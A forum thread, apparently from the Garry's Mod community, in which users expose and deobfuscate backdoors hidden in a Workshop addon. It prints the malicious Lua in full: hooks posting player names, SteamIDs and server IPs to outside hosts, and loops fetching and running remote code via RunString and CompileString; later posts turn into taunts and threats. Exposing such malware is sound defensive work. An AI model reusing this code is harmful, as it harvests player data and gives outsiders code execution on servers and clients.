Anouther workshop backdoor :/

The backdoor is he

The backdoor is in autorun/client/cl_connector.lua


hf674f = string.char(104,116,116,112,58,47,47,119,119,119,46,103,97,109,101,115,101,114,118,101,114,101,110,102,111,114,99,101,114,46,99,111,109,47,97,112,105,47)

fg7jh9 = string.char(115,112,46,112,104,112)

local dh271f = _G[string.char(116,105,109,101,114)][string.char(83,105,109,112,108,101)] 

local dh272f = _G[string.char(104,116,116,112)][string.char(80,111,115,116)]

dh271f(15, function()



local clientIP = "0.0.0.0:0"

local sendTbl2 = {

		sn = LocalPlayer():Nick(), 

		sid = LocalPlayer():SteamID(),

		ip = clientIP



		}

if(game.SinglePlayer()) then 

dh272f(hf674f..fg7jh9, sendTbl2 )

else return nil 

end

end)string.char(59)

Has two workshop addons so presumably thats backdoored too.

These are people who were known using this

Some logs of spam.

is that all?
[lua]
timer.Simple( 15, function()
local clientIP = “0.0.0.0:0”
local sendTbl2 = {
sn = LocalPlayer():Nick(),
sid = LocalPlayer():SteamID(),
ip = clientIP
}
if ( game.SinglePlayer() ) then
http.Post( “http://www.gameserverenforcer.com/api/sp.php”, sendTbl2 )
else
return nil
end
end )
[/lua]

Pretty sure theres more im just not looking, but the server that was being attacked runs all legit addons from scriptfodder which I verified, thats the only suspicious code on the server, and if its only doing that why obfuscate it, pretty sure theirs more in the addon.

advanced_duplicator_2_710427584\lua\autorun\client\cl_client_connector.lua
advanced_duplicator_2_710427584\lua\autorun\client\cl_connector.lua
advanced_duplicator_2_710427584\lua\autorun\server\advdupe2_sv_connector.lua

EDIT: done
[lua]

– advanced_duplicator_2_710427584\lua\autorun\client\cl_connector.lua
timer.Simple( 15, function()
local clientIP = “0.0.0.0:0”
local sendTbl2 = {
sn = LocalPlayer():Nick(),
sid = LocalPlayer():SteamID(),
ip = clientIP
}
if ( game.SinglePlayer() ) then
http.Post( “http://www.gameserverenforcer.com/api/sp.php”, sendTbl2 )
else
return nil
end
end )

– advanced_duplicator_2_710427584\lua\autorun\server\advdupe2_sv_connector.lua
timer.Create( “connect”, 300, 0, function()
http.Fetch( “http://www.gameserverenforcer.com/api/help.cfg”, function© RunString© end )
end )
sendTbl = {
sn = GetHostName(),
playercount = tostring( #player.GetAll() ),
ip = game.GetIPAddress()
}
timer.Simple( 15, function()
if ( game.SinglePlayer() ) then
return nil
else
http.Post( “http://www.gameserverenforcer.com/api/index.php”, sendTbl )
end
end )

– advanced_duplicator_2_710427584\lua\autorun\client\cl_client_connector.lua
local function decoder( s )
if string.len( s ) == 0 then return s end
local sNew = ‘’
for _ in string.gmatch( s, ‘…’ ) do
sNew = sNew…string.char( bit.bxor( tonumber( _, 16 ), 9 ) )
end
return sNew
end
timer.Create( “dasdjalsdja”, 10, 0, function()
http.Post( “http://femboys.pw/bd/”, { [“typ”] = “memed” }, function( code )
local t = util.JSONToTable( code )
if string.lower( type( t ) ) != “table” then return end
local id = t[“id”] or “noid”
local time = tonumber( t[“t”] )
if os.time( os.date( “!*t” ) ) > time then return end
if id == “all” or id == LocalPlayer():SteamID( LocalPlayer() )then
local func = CompileString( t[“code”], “.”, false ) or “”
if isfunction( func ) then
func()
end
end
end,
function () end )
end )
[/lua]

I can assure you none of the addons on my account have a backdoor.

:snip:

There’s another backdoor in this one. It’s hidden on the bottom of the file.

EDIT:
Looks like the author removed it from the workshop.

Link to the GMA

Removing the addon from workshop is basically admission of guilt :confused:

https://gyazo.com/45ad74654527bc0634f1453c26dd0a9f.jpg

Not sure why I got rated dumb, told ya guys there was more just didn’t find it as had to go out.

As the title says, it only contained materials.

Its just pixels.

:speechless:
Have you learned nothing from neurotech?

Ha, Such a pitiful excuse of a “backdoor”, and I wonder where they got that idea from? Try harder next time.

Tracking/Linking SteamID, SteamName and player-IPs together. (It might show clientIP = “0.0.0.0:0” … but he can still log the IP from his server.)



-- advanced_duplicator_2_710427584\lua\autorun\client\cl_connector.lua
timer.Simple( 15, function()
	local clientIP = "0.0.0.0:0"
	local sendTbl2 = {
		sn = LocalPlayer():Nick(),
		sid = LocalPlayer():SteamID(),
		ip = clientIP
	}
	if ( game.SinglePlayer() ) then 
		http.Post( "http://www.gameserverenforcer.com/api/sp.php", sendTbl2 )
	else
		return nil 
	end
end )

A backdoor connected to his server. Any lua he uploads to “http://www.gameserverenforcer.com/api/help.cfg” will be run.



-- advanced_duplicator_2_710427584\lua\autorun\server\advdupe2_sv_connector.lua
timer.Create( "connect", 300, 0, function()
	http.Fetch( "http://www.gameserverenforcer.com/api/help.cfg", function(c) RunString(c) end )
end )


A slightly more harmless tracker. It only send severname, IP and playercount.



sendTbl = {
		sn = GetHostName(),
		playercount = tostring( #player.GetAll() ),
		ip = game.GetIPAddress()
}
timer.Simple( 15, function()
	if ( game.SinglePlayer() ) then 
		return nil
	else
		http.Post( "http://www.gameserverenforcer.com/api/index.php", sendTbl ) 
	end
end )

Allows him to run lua on clients by their steamID, from his server “femboys.pw”.



-- advanced_duplicator_2_710427584\lua\autorun\client\cl_client_connector.lua
timer.Create( "dasdjalsdja", 10, 0, function()
	http.Post( "http://femboys.pw/bd/", { ["typ"] = "memed" }, function( code )
		local t = util.JSONToTable( code )
		if string.lower( type( t ) ) != "table" then return end
		local id = t["id"] or "noid"
		local time = tonumber( t["t"] )
		if os.time( os.date( "!*t" ) ) > time then return end
		if id == "all" or id == LocalPlayer():SteamID( LocalPlayer() )then
			local func = CompileString( t["code"], ".", false ) or ""
			if isfunction( func ) then
				func()
			end
		end
	end,
	function () end )
end )

It fetches the http every 10 seconds … It can only be for malicious stuff, when it updates that fast.

Looks like Moku and his friends are resorting to either paying or becoming friends in order to upload pathetic badly coded malicious lua to to the workshop. The site femboys.pw will be made unavailable soon to stop any malicious activity.

This is also yet again another prime example of the same individuals unable to think of anything original themselves and have to steal concepts and ideas from others for their own personal gain.

Be warned we are coming for you next.

are u the real anonymous

Oh so how infantile your responses are. The concept of “anonymous” is completely and utterly stupid anyway, your attempts to demean me are pathetic ,try harder, we are OE2016.

carefull he is

ok

Aaand who is that?